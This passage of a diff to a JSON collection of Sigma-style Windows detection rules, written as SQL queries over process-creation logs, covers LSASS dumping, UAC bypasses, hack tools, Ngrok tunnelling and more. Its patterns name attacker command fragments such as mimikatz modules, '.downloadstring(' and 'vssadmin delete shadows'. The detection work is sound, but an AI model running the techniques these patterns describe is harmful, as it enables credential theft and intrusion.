= 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { "title": "UAC Bypass via Event Viewer", 
@@ -14147,9757 +13759,9596 @@ "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Administrative activity" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + 
"filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects 
suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + 
"Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or 
detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "HTML Help HH.EXE Suspicious Child 
Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' 
ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' 
OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 
139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND 
(CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% 
